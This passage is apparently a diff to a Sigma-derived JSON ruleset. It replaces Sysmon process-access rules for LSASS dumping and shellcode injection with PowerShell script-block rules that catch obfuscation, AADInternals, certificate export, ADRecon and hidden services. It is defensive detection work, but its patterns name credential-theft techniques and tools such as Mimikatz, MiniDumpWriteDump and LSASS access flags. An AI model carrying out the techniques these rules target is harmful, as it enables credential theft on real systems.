"author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": 
"91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + 
"filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR 
GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND 
SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": 
"test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR 
SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE 
'%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" - ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" - }, - { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "falsepositives": [ - "Unknown" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" - ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" - }, - { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP 
Reverse Shell", 
@@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), 
Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": 